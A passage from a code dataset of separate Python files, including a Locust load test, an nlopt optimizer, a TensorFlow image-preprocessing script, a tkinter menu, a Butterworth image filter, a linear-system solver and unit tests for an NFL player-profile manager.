nlopt.srand(params['seed'])\n opt = nlopt.opt(nlopt.LN_PRAXIS, num_parameters)\n opt.set_min_objective(objective)\n opt.set_maxeval(options['maxiter'])\n \n if params['ansatz'] == 'QAOA':\n lb = np.array([0, 0] * params['ansatz_depth'])\n ub = np.array([np.pi, 2*np.pi] * params['ansatz_depth'])\n elif params['ansatz'] == 'RYRZ':\n lb = np.array([-np.pi] * num_parameters)\n ub = np.array([np.pi] * num_parameters)\n\n #dist_to_bound = min(min(ub-init_points),min(init_points-lb))\n #opt.set_initial_step(dist_to_bound)\n opt.set_ftol_rel(params['ftol_rel']) \n opt.set_xtol_rel(params['xtol_rel'])\n\n opt.set_lower_bounds(lb)\n opt.set_upper_bounds(ub)\n x = opt.optimize(init_points)\n return x\n","sub_path":"qcommunity/optimization/praxis_nlopt.py","file_name":"praxis_nlopt.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"529538465","text":"#!/usr/bin/python\n#\n# Copyright 2018 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport random\nimport uuid\nimport logging\nimport os\nfrom locust import HttpLocust, TaskSet\nfrom locust.events import request_failure\nfrom binascii import hexlify\n\nprefixes = [\n 'goo',\n 'mic',\n 'app',\n 'fgssg',\n 'int',\n 'mo',\n 'ewer',\n 'am',\n 'ma',\n 'ip',\n 'sdf']\n\nUSER_AGENTS = [\n \"Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19 (LocustIO)\",\n \"Android 4.0.3;AppleWebKit/534.30;Build/IML74K;GT-I9220 Build/IML74K (LocustIO)\",\n \"KWC-S4000/ UP.Browser/7.2.6.1.794 (GUI) MMP/2.0 (LocustIO)\",\n \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) (LocustIO)\",\n \"Googlebot-Image/1.0 (LocustIO)\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0 (LocustIO)\",\n \"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52 (LocustIO)\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36\",\n]\n\n\nclass B3Header:\n def generateHeader(self, identifier_length):\n bit_length = identifier_length * 4\n byte_length = int(bit_length / 8)\n identifier = os.urandom(byte_length)\n return hexlify(identifier).decode('ascii')\n\n\nb3 = B3Header()\n\n\ndef on_failure(request_type, name, response_time, exception, **kwargs):\n logging.error(exception.request)\n logging.error(exception.response)\n\n\nrequest_failure += on_failure\n\n\ndef findProduct(l):\n h = {\n \"User-Agent\": random.choice(USER_AGENTS),\n \"x-client-trace-id\": str(uuid.uuid4()),\n \"x-b3-sampled\": \"1\",\n \"x-b3-flags\": \"1\",\t\n \"x-b3-traceid\": b3.generateHeader(32),\n \"x-b3-spanid\": b3.generateHeader(16)\n }\n logging.info(h)\n l.client.get(\"/api/fetchProducts?name=\" +\n random.choice(prefixes), headers=h)\n\n\nclass UserBehavior(TaskSet):\n tasks = {findProduct: 1}\n\n\nclass WebsiteUser(HttpLocust):\n\n task_set = UserBehavior\n min_wait = 1000\n max_wait = 10000\n","sub_path":"pre-grpc/src/loadgenerator/locustfile.py","file_name":"locustfile.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"3516507","text":"# Copyright 2017 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Static definitions, such as constants.\"\"\"\n\nimport cProfile\nimport functools\nimport logging\nimport math\nimport typing\nimport injector\nimport numpy\nfrom simulation.configuration import Configuration\n\nT = typing.TypeVar('T')\n\nDAYS = {\n 'Sunday': 0,\n 'Monday': 1,\n 'Tuesday': 2,\n 'Wednesday': 3,\n 'Thursday': 4,\n 'Friday': 5,\n 'Saturday': 6,\n}\n\n# All this functions convert to seconds.\nHOUR = lambda x: x * 3600.0\nDAY = lambda x: x * HOUR(24)\nWEEK = lambda x: x * DAY(7)\n\n# And these to bytes.\nKB = lambda x: x << 10\nMB = lambda x: x << 20\n\n\ndef config_logging(config: Configuration) -> None:\n \"\"\"Sets logging basic config\"\"\"\n logging.basicConfig(\n format='%(asctime)s %(levelname)s(%(name)s): %(message)s',\n datefmt='%d/%m/%Y %H:%M:%S',\n level=logging.DEBUG if config.get_arg('debug') else logging.INFO)\n logging.captureWarnings(True)\n\n\n# pylint: disable=invalid-name,too-few-public-methods\nclass profile:\n \"\"\"Decorator to run a function and generate a trace.\"\"\"\n\n @injector.inject\n def __init__(self, config: Configuration):\n super(profile, self).__init__()\n self.__config = config\n\n def __call__(self, func: typing.Callable[..., T]) -> T:\n\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n \"\"\"Wraps the function generating a trace.\"\"\"\n if self.__config.get_arg('trace'):\n profiler = cProfile.Profile()\n profiler.enable()\n\n ret = func(*args, **kwargs)\n\n if self.__config.get_arg('trace'):\n profiler.create_stats()\n profiler.dump_stats('trace')\n\n return ret\n\n return wrapper\n\n\ndef timestamp_to_day(timestamp: int) -> typing.Tuple[int, int]:\n \"\"\"Converts from a simulation timestamp to the pair (day, hour).\"\"\"\n day = int((timestamp % WEEK(1)) // DAY(1))\n hour = int((timestamp % DAY(1)) // HOUR(1))\n return day, hour\n\n\n# pylint: disable=invalid-name,no-member\ndef weight(x: float, ip: float, fp: float) -> float:\n \"\"\"Linear increment between ip and fp function.\"\"\"\n return numpy.maximum(0.0, numpy.minimum(1.0, (ip - x) / (ip - fp)))\n\n\n# pylint: disable=invalid-name\ndef weighted_user_satisfaction(\n t: float, timeout: float, threshold: float) -> float:\n \"\"\"Calculates the weighted satisfaction with a sigmoid.\"\"\"\n return numpy.where(t < timeout, 1.0, weight(t - timeout, 60, threshold))\n\n\ndef user_satisfaction(t: float, timeout: float) -> float:\n \"\"\"Calculates plain old user satisfaction.\"\"\"\n return numpy.where(t < timeout, 1.0, 0.0)\n\n\ndef generate_servers(size: int) -> typing.List[str]:\n \"\"\"Generates a list of servers randomly generated.\"\"\"\n fill = math.ceil(math.log(size, 10))\n return ['workstation' + str(i).zfill(fill) for i in range(size)]\n","sub_path":"simulation/static.py","file_name":"static.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"462833344","text":"#将原始图片转换成需要的大小,并将其保存 \n#制作threcords然乎从tfrecords中读取数据,reshape成64x64并保存\n#======================================================================================== \nimport os \nimport numpy as np \nimport tensorflow as tf \nfrom PIL import ImageFile\nfrom PIL import Image\nImageFile.LOAD_TRUNCATED_IMAGES = True\n \n#原始图片的存储位置 \npath=os.path.abspath('.')\norig_picture =path + '/pic'#图片在pic文件夹下的 mao和gou 的文件夹下 \n#orig_picture = 'C:/Users/zhuan/Desktop/tf/pic' \n \n#生成图片的存储位置 \ngen_picture =path+ '/pic/test_data' #会在inputdata下生产64x64的数据\n \n#需要的识别类型 \nclasses = {'ok','liefeng','qinshituoluo','wailu','wusun'} #这是一个dict只不过他的value为零\n \n#样本总数 \n#num_samples = 74 \n\nnum_samples = 5702\n \n#制作TFRecords数据 \ndef create_record(): \n writer = tf.python_io.TFRecordWriter(\"train.tfrecords\") \n for index, name in enumerate(classes): #enumerate既可以遍历又可以索引,index是索引号,name是字典里的key值 \n class_path = orig_picture +\"/\"+ name+\"/\" \n i = 0\n for img_name in os.listdir(class_path): \n img_path = class_path + img_name \n img = Image.open(img_path) \n img = img.resize((64, 64)) \n #设置需要转换的图片大小\n i = i+1\n print(\"成功转化\",i,\"张图片\")\n# img = img.tf.image.resize_images() #设置需要转换的图片大小 \n img_raw = img.tobytes() #将图片转化为原生bytes \n# print (index,img_raw) \n example = tf.train.Example( \n features=tf.train.Features(feature={ \n \"label\": tf.train.Feature(int64_list=tf.train.Int64List(value=[index])), \n 'img_raw': tf.train.Feature(bytes_list=tf.train.BytesList(value=[img_raw])) \n })) \n\t\t\t # 写 TFRecord\n writer.write(example.SerializeToString()) \n writer.close() \n# \n#======================================================================================= \ndef read_and_decode(filename): \n # 创建文件队列,不限读取的数量 \n filename_queue = tf.train.string_input_producer([filename]) \n # create a reader from file queue \n reader = tf.TFRecordReader() \n # reader从文件队列中读入一个序列化的样本 \n _, serialized_example = reader.read(filename_queue) \n # get feature from serialized example \n # 解析符号化的样本 \n features = tf.parse_single_example( \n serialized_example, \n features={ \n 'label': tf.FixedLenFeature([], tf.int64), \n 'img_raw': tf.FixedLenFeature([], tf.string) \n }) \n label = features['label'] \n img = features['img_raw'] \n img = tf.decode_raw(img, tf.uint8) \n img = tf.reshape(img, [64, 64, 3]) \n# img = tf.cast(img, tf.float32) * (1. / 255) - 0.5 \n label = tf.cast(label, tf.int32) \n return img, label \n \n#======================================================================================= \nif __name__ == '__main__': \n create_record() \n batch = read_and_decode('train.tfrecords') \n init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer()) \n \n with tf.Session() as sess: #开始一个会话 \n sess.run(init_op) \n coord=tf.train.Coordinator() \n threads= tf.train.start_queue_runners(coord=coord) \n# print(sess.run(batch))\n for i in range(num_samples): \n try:\n example, lab = sess.run(batch) #在会话中取出image和label \n# print(example)\n except:\n print (\"错误异常\")\n img=Image.fromarray(example, 'RGB')#这里Image是之前提到的 \n img.save(gen_picture+'/'+str(lab)+'/'+str(i)+'samples'+str(lab)+'.jpg')\n print(\"第\",i+1,\"张图片成功输出\")\n #存下图片;注意cwd后边加上‘/’ \n# print(example, lab) \n coord.request_stop() \n coord.join(threads) \n sess.close()","sub_path":"预处理.py","file_name":"预处理.py","file_ext":"py","file_size_in_byte":4336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"369547838","text":"from tkinter import *\nfrom tkinter import messagebox\nfrom screens.stud_det import *\nfrom screens.attendence import *\nfrom screens.electives import *\nfrom screens.to_login import ToLogin\nfrom screens.marks import *\nfrom screens.placement import *\nfrom PIL import Image, ImageTk\nfrom screens.placement_det import *\n#import screens.login as log\n\n\nclass Placement:\n def __init__(self):\n\n self.root = Toplevel()\n self.root.geometry(\"2000x1024\")\n\n self.root.title(\"Menu\")\n self.c = Canvas(self.root,bg = \"gray\",height=2000,width=2024)\n # image = Image.open(\"images/epic1.png\")\n # photo = ImageTk.PhotoImage(image)\n photo = PhotoImage(file = \"images/plac.png\")\n \n # Setting the background\n self.c.create_image((0,0), image=photo, anchor=\"nw\")\n\n \n # Setting the font\n self.fnt = ('latin modern typewriter',50,'bold')\n \n # Setting the text\n\n self.c.create_text((600, 150), text=\"SELECT BRANCH\", fill=\"black\", anchor=\"nw\"\n ,font=('newcenturyschlbk',50,'bold'))\n\n\n\n\n self.back = Button(self.c,text='Back',bg='red',fg='white',activebackground='black',activeforeground='white',width=10,height=2, font=(\"Times\",20,'bold'),command=lambda:back())\n self.back.place(x=1400,y=900,width=100,height=40)\n\n\n\n def back():\n self.root.destroy() \n\n\n self.c.pack()\n self.back = Button(self.c,text='Back',bg='red',fg='white',activebackground='black',activeforeground='white',width=10,height=2, font=(\"Times\",15,'bold'),command=lambda:back())\n\n\n self.b1 = Button(self.c,text='CSE',bg='yellow',fg='blue',activebackground='black',activeforeground='white',width=20,height=7, font=(\"Times\",25,'bold'),command=lambda:buttonClick('CSE'))\n self.b2 = Button(self.c,text='ISE',bg='yellow',fg='blue',activebackground='black',activeforeground='white',width=20,height=7,font=(\"Times\",25,'bold'),command=lambda:buttonClick('ISE'))\n self.b3 = Button(self.c,text='ECE',bg='yellow',fg='blue',activebackground='black',activeforeground='white',width=20,height=7,font=(\"Times\",25,'bold'),command=lambda:buttonClick('ECE'))\n self.b4 = Button(self.c,text='TC',bg='yellow',fg='blue',activebackground='black',activeforeground='white',width=20,height=7, font=(\"Times\",25,'bold'),command=lambda:buttonClick('TC'))\n\n self.b5 = Button(self.c,text='ME',bg='yellow',fg='blue',activebackground='black',activeforeground='white',width=20,height=7, font=(\"Times\",25,'bold'),command=lambda:buttonClick('ME'))\n self.b6 = Button(self.c,text='IEM',bg='yellow',fg='blue',activebackground='black',activeforeground='white',width=20,height=7, font=(\"Times\",25,'bold'),command=lambda:buttonClick('IEM'))\n\n self.b1.place(x=800,y=300,width=300,height=50)\n self.b2.place(x=800,y=380,width=300,height=50)\n self.b3.place(x=800,y=460,width=300,height=50)\n self.b4.place(x=800,y=540,width=300,height=50)\n self.b5.place(x=800,y=620,width=300,height=50)\n self.b6.place(x=800,y=700,width=300,height=50)\n \n def back():\n self.root.destroy()\n # b = log.Login()\n \n\n def buttonClick(branch):\n a = PlacementDetails(branch)\n\n self.root.mainloop()\n \na = Placement()","sub_path":"screens/placement.py","file_name":"placement.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"261643776","text":"import numpy as np\nfrom numpy import array\n\n# == Parameters == #\nβ = 1 / 1.05\nρ, mg = .7, .35\nA = np.identity(2)\nA[0, :] = ρ, mg * (1-ρ)\nC = np.zeros((2, 1))\nC[0, 0] = np.sqrt(1 - ρ**2) * mg / 10\nSg = array((1, 0)).reshape(1, 2)\nSd = array((0, 0)).reshape(1, 2)\nSb = array((0, 2.135)).reshape(1, 2)\nSs = array((0, 0)).reshape(1, 2)\n\neconomy = Economy(β=β,\n Sg=Sg,\n Sd=Sd,\n Sb=Sb,\n Ss=Ss,\n discrete=False,\n proc=(A, C))\n\nT = 50\npath = compute_paths(T, economy)\ngen_fig_1(path)\n","sub_path":"lqramsey/lqramsey_ar1.py","file_name":"lqramsey_ar1.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"380244753","text":"'''\nConstruya un filtro pasa-altos tipo Butterworth utilizando la definición en\nfrecuencia. Filtre una imagen, modificando la frecuencia de corte y compro-\nbando el efecto sobre la imagen filtrada. Verifique el efecto del filtro \nrespecto al fenómeno de Gibbs.\n'''\n#python 006-pbi.py -i ../imgs/chairs.jpg\n\nimport cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport argparse\n\n'''\n Argumentos\n'''\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--imagem\", required=True, help=\"Imagem\")\n\n\n'''\n Realiza a Transformada de Fourier e retorna a magnitude e a fase.\n''' \ndef tf_complexa(im):\n # Para armazenar resultado da transformação\n planos = [np.float32(im), np.zeros(im.shape, np.float32)]\n tf = cv.merge(planos)\n # Transformada \n tf = cv.dft(tf, cv.DFT_COMPLEX_OUTPUT)\n #calcular magnitude, planos[0] = real, planos[1] = imaginário\n planos = cv.split(tf)\n magn, fase = cv.cartToPolar(planos[0],planos[1], angleInDegrees=False)\n #escala logaritmica\n #magn = cv.log(magn + 1)\n #centralizar\n magn = np.fft.fftshift(magn, axes=None)\n return magn, fase\n\n\n'''\n Filtro Butterworth (passa baixa, para passa alta, filtro = 1 - filtro)\nfiltro = 1/1+{D(u,v)/d}^2n, D(u,v) = [(u - P/2)^2 + (v - Q/2)^2]^1/2\n'''\ndef filtro_bw(lin, col, corte, ordem):\n filtro = np.zeros((lin, col), np.float32)\n # Corte ideal entre 2% e 5% da menor dimensão da imagem\n if lin < col:\n corte *= lin\n else:\n corte *= col\n\n for x in range(lin):\n for y in range(col):\n # // = parte inteira da divisão\n d = ((x - lin//2)**2 + (y - col//2)**2)**1/2\n bw = 1.0 / (1 + (d/corte) ** ordem)\n filtro[x,y] = bw\n filtro = 1 - filtro\n return filtro\n\n\n'''\n Aplicar Filtro em domínio frequencial.\n'''\ndef aplicar_filtro(magn, filtro):\n # Filtro para o domínio da frequência\n fmg, ffs = tf_complexa(filtro)\n # Aplicar\n rmg = cv.mulSpectrums(magn, fmg, cv.DFT_ROWS)\n rmg = np.fft.ifftshift(rmg, axes=None)\n return rmg\n\n\n'''\n MAIN\n'''\ndef main():\n \n # Imagens\n args = vars(ap.parse_args())\n img = cv.imread(args[\"imagem\"], 0)\n [alt, larg] = img.shape\n corte = 0.00009\n ordem = 2\n \n # Transformada \n m, f = tf_complexa(img)\n\n # Filtro\n fb = filtro_bw(alt, larg, corte, ordem)\n mf = aplicar_filtro(m, fb) \n\n # Montando \n x, y = cv.polarToCart(mf, f, angleInDegrees=False)\n im = cv.merge([x, y])\n\n # Inversa\n inv = cv.idft(im, cv.DFT_COMPLEX_OUTPUT)\n\n # Combinar imagens para mostrar\n r = cv.magnitude(inv[:,:,0], inv[:,:,1])\n \n # Normalizar\n r = cv.normalize(r, 0, 255, cv.NORM_MINMAX)\n\n # Mostrar\n plt.subplot(1,2,1)\n plt.xticks([])\n plt.yticks([])\n plt.title(\"Original\")\n plt.imshow(img, cmap=\"gray\")\n \n plt.subplot(1,2,2)\n plt.xticks([])\n plt.yticks([])\n plt.title(\"Filtrada\")\n plt.imshow(r, cmap=\"gray\")\n\n plt.show()\n\n\n\nif __name__ == \"__main__\":\n main()\n\n\n","sub_path":"pratica5/009-hpbw.py","file_name":"009-hpbw.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"615311734","text":"# -*- coding: utf-8 -*-\n\nfrom sole import SoLE\nfrom Matrix import Matrix\nimport time\n\nclass Model:\n\n def __init__(self):\n # Створення порожньої системи\n self.system = None\n self.n = 0\n\n # Метод, що змінює розмірність СЛАУ і коректно зберегає старі дані\n def set_varnum(self, n):\n if self.system is None:\n A = Matrix(n, n, value=0)\n b = Matrix(n, 1, value=0)\n self.system = SoLE(A, b)\n self.n = n\n else:\n A = Matrix(n, n, value=0)\n b = Matrix(n, 1, value=0)\n N = n if n < self.n else self.n\n # Старі значення зберігаються, нові - 0\n for i in range(N):\n b.elements[i][0] = self.system.free_members.elements[i][0]\n for j in range(N):\n A.elements[i][j] = self.system.system_matrix.elements[i][j]\n self.n = n\n self.system = SoLE(A, b)\n\n # Метод, що розв'язує систему обраним методом з обраною точністю\n # Також заміряє час виконання программи\n def solve(self, method, eps):\n if method == 0:\n m = self.system.method_Jacobi\n elif method == 1:\n m =self.system.method_Gauss_Seidel\n else:\n m = self.system.method_gradient_descent\n t1 = time.time()\n res = m(eps)\n t = time.time() - t1\n return (res, t)\n\n\n\n\n","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"47065059","text":"import unittest\nimport os\nimport json\nfrom typing import List\nimport random\nimport nflapi.Client\nfrom nflapidb.RosterManagerFacade import RosterManagerFacade\nfrom nflapidb.PlayerProfileManagerFacade import PlayerProfileManagerFacade\nfrom nflapidb.EntityManager import EntityManager\nimport nflapidb.Utilities as util\n\nclass TestPlayerProfileManagerFacade(unittest.TestCase):\n\n def setUp(self):\n self.entityName = \"player_profile\"\n self.entmgr = EntityManager()\n\n def tearDown(self):\n util.runCoroutine(self.entmgr.drop(self.entityName))\n self.entmgr.dispose()\n\n def _getMockPlayerProfileManager(self, rosterData : List[dict], profileData : List[dict]):\n apiClient = MockApiClient(profileData)\n rmgr = MockRosterManagerFacade(self.entmgr, apiClient, rosterData)\n self.datamgr = PlayerProfileManagerFacade(self.entmgr, apiClient, rmgr)\n return self.datamgr\n\n def _getPlayerProfileManager(self):\n self.datamgr = PlayerProfileManagerFacade(self.entmgr)\n return self.datamgr\n\n def test_sync_initializes_collection_one_team(self):\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"roster_kc.json\"), \"rt\") as fp:\n rstdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_kc.json\"), \"rt\") as fp:\n srcdata = json.load(fp)\n rmgr = self._getMockPlayerProfileManager(rosterData=rstdata, profileData=srcdata)\n recs = util.runCoroutine(rmgr.sync())\n self.assertEqual(len(recs), len(srcdata), \"sync returned record count differs\")\n dbrecs = util.runCoroutine(self.entmgr.find(self.entityName))\n self.assertEqual(dbrecs, recs, \"db records differ\")\n self.assertEqual(rmgr._apiClient.getRequestedRosters(), rstdata, \"requested rosters differs\")\n\n def test_sync_initializes_collection_two_teams(self):\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"roster_kc.json\"), \"rt\") as fp:\n rstdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"roster_pit.json\"), \"rt\") as fp:\n rstdata.extend(json.load(fp))\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_kc.json\"), \"rt\") as fp:\n srcdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_pit.json\"), \"rt\") as fp:\n srcdata.extend(json.load(fp))\n rmgr = self._getMockPlayerProfileManager(rosterData=rstdata, profileData=srcdata)\n recs = util.runCoroutine(rmgr.sync())\n self.assertEqual(len(recs), len(srcdata), \"sync returned record count differs\")\n dbrecs = util.runCoroutine(self.entmgr.find(self.entityName))\n self.assertEqual(dbrecs, recs, \"db records differ\")\n self.assertEqual(rmgr._apiClient.getRequestedRosters(), rstdata, \"requested rosters differs\")\n\n def test_sync_only_updates_records_with_team_change(self):\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"roster_kc.json\"), \"rt\") as fp:\n rstdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"roster_pit.json\"), \"rt\") as fp:\n rstdata.extend(json.load(fp))\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_kc.json\"), \"rt\") as fp:\n srcdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_pit.json\"), \"rt\") as fp:\n srcdata.extend(json.load(fp))\n rmgr = self._getMockPlayerProfileManager(rosterData=rstdata, profileData=srcdata)\n recs = util.runCoroutine(rmgr.sync())\n xreqrec = []\n for rec in rstdata:\n if rec[\"profile_id\"] == 2560950:\n rec[\"team\"] = \"KC\"\n xreqrec.append(rec)\n xrec = []\n for rec in srcdata:\n if rec[\"profile_id\"] == 2560950:\n rec[\"team\"] = \"KC\"\n crec = rec.copy()\n # Since the team is changing the previous_teams attribute should be set\n crec[\"previous_teams\"] = [\"PIT\"]\n xrec.append(crec)\n rmgr = self._getMockPlayerProfileManager(rosterData=rstdata, profileData=srcdata)\n recs = util.runCoroutine(rmgr.sync())\n self.assertEqual(rmgr._apiClient.getRequestedRosters(), xreqrec, \"requested rosters differs\")\n self.assertEqual(len(recs), 1, \"sync returned record count differs\")\n dbrecs = util.runCoroutine(self.entmgr.find(self.entityName,\n query={\"profile_id\": 2560950},\n projection={\"_id\": False}))\n self.assertEqual(len(dbrecs), 1, \"db record counts differ\")\n self.assertEqual(dbrecs, xrec, \"db records differ\")\n\n def test_sync_updates_nothing_with_no_team_change(self):\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"roster_kc.json\"), \"rt\") as fp:\n rstdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"roster_pit.json\"), \"rt\") as fp:\n rstdata.extend(json.load(fp))\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_kc.json\"), \"rt\") as fp:\n srcdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_pit.json\"), \"rt\") as fp:\n srcdata.extend(json.load(fp))\n rmgr = self._getMockPlayerProfileManager(rosterData=rstdata, profileData=srcdata)\n recs = util.runCoroutine(rmgr.sync())\n rmgr = self._getMockPlayerProfileManager(rosterData=rstdata, profileData=srcdata)\n recs = util.runCoroutine(rmgr.sync())\n self.assertEqual(len(recs), 0, \"sync returned record count differs\")\n self.assertEqual(rmgr._apiClient.getRequestedRosters(), [], \"requested rosters differs\")\n\n def test_sync_updates_all_with_all(self):\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"roster_kc.json\"), \"rt\") as fp:\n rstdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"roster_pit.json\"), \"rt\") as fp:\n rstdata.extend(json.load(fp))\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_kc.json\"), \"rt\") as fp:\n srcdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_pit.json\"), \"rt\") as fp:\n srcdata.extend(json.load(fp))\n rmgr = self._getMockPlayerProfileManager(rosterData=rstdata, profileData=srcdata)\n recs = util.runCoroutine(rmgr.sync())\n def pidmap(recs : List[dict]) -> dict:\n return dict(zip([_[\"profile_id\"] for _ in recs], recs))\n rmap = pidmap(rstdata.copy())\n pmap = pidmap(srcdata.copy())\n usrcdata = []\n for pid in rmap:\n t = random.choice([\"KC\", \"PIT\"])\n rmap[pid][\"team\"] = t\n pmap[pid][\"team\"] = t\n usrcdata.append(pmap[pid])\n rmgr = self._getMockPlayerProfileManager(rosterData=list(rmap.values()), profileData=usrcdata)\n recs = util.runCoroutine(rmgr.sync(all=True))\n self.assertEqual(len(recs), len(usrcdata), \"sync returned record count differs\")\n dbrecs = util.runCoroutine(self.entmgr.find(self.entityName, projection={\"_id\": False}))\n self.assertEqual(dbrecs, usrcdata, \"db records differ\")\n\n def test_save_appends(self):\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"roster_kc.json\"), \"rt\") as fp:\n kcrdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_kc.json\"), \"rt\") as fp:\n kcdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_pit.json\"), \"rt\") as fp:\n pitdata = json.load(fp)\n rmgr = self._getMockPlayerProfileManager(rosterData=kcrdata, profileData=kcdata.copy())\n recs = util.runCoroutine(rmgr.sync())\n self.assertEqual(len(recs), len(kcdata), \"sync record count differs\")\n recs.extend(util.runCoroutine(rmgr.save(pitdata.copy())))\n self.assertEqual(len(recs), len(kcdata) + len(pitdata), \"save record count differs\")\n dbrecs = util.runCoroutine(self.entmgr.find(self.entityName))\n self.assertEqual(len(dbrecs), len(recs), \"db record count differs\")\n self.assertEqual(dbrecs, recs, \"db records differ\")\n\n def test_save_updates_previous_team(self):\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"roster_kc.json\"), \"rt\") as fp:\n srcrdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"roster_pit.json\"), \"rt\") as fp:\n srcrdata.extend(json.load(fp))\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_kc.json\"), \"rt\") as fp:\n kcdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_pit.json\"), \"rt\") as fp:\n pitdata = json.load(fp)\n srcdata = kcdata.copy()\n srcdata.extend(pitdata.copy())\n rmgr = self._getMockPlayerProfileManager(rosterData=srcrdata, profileData=srcdata)\n recs = util.runCoroutine(rmgr.sync())\n self.assertEqual(len(recs), len(srcdata), \"sync record count differs\")\n for rec in pitdata:\n if rec[\"profile_id\"] == 2560950:\n rec[\"team\"] = \"KC\"\n kcdata.append(rec)\n recs2 = util.runCoroutine(rmgr.save(kcdata.copy()))\n self.assertEqual(len(recs2), len(kcdata), \"save record count differs\")\n dbrecs = util.runCoroutine(self.entmgr.find(self.entityName, projection={\"_id\": False}))\n self.assertEqual(len(dbrecs), len(srcdata), \"db record count differs\")\n for rec in srcdata:\n if rec[\"profile_id\"] == 2560950:\n rec[\"team\"] = \"KC\"\n rec[\"previous_teams\"] = [\"PIT\"]\n self.assertEqual(dbrecs, srcdata, \"db records differ\")\n\n def test_delete_team(self):\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_kc.json\"), \"rt\") as fp:\n kcdata = json.load(fp)\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_pit.json\"), \"rt\") as fp:\n pitdata = json.load(fp)\n srcdata = kcdata.copy()\n srcdata.extend(pitdata.copy())\n rmgr = self._getPlayerProfileManager()\n recs = util.runCoroutine(rmgr.save(srcdata))\n self.assertEqual(len(recs), len(srcdata), \"save returned record count differs\")\n dcount = util.runCoroutine(rmgr.delete(teams=[\"PIT\"]))\n self.assertEqual(dcount, len(pitdata), \"delete returned record count differs\")\n dbrecs = util.runCoroutine(self.entmgr.find(self.entityName))\n self.assertEqual(len(dbrecs), len(kcdata), \"db record count differs\")\n for rec in dbrecs:\n del rec[\"_id\"]\n self.assertEqual(dbrecs, kcdata, \"db records differ\")\n\n def test_delete_profile_id(self):\n with open(os.path.join(os.path.dirname(__file__), \"data\", \"player_profile_kc.json\"), \"rt\") as fp:\n srcdata = json.load(fp)\n rmgr = self._getPlayerProfileManager()\n recs = util.runCoroutine(rmgr.save(srcdata))\n 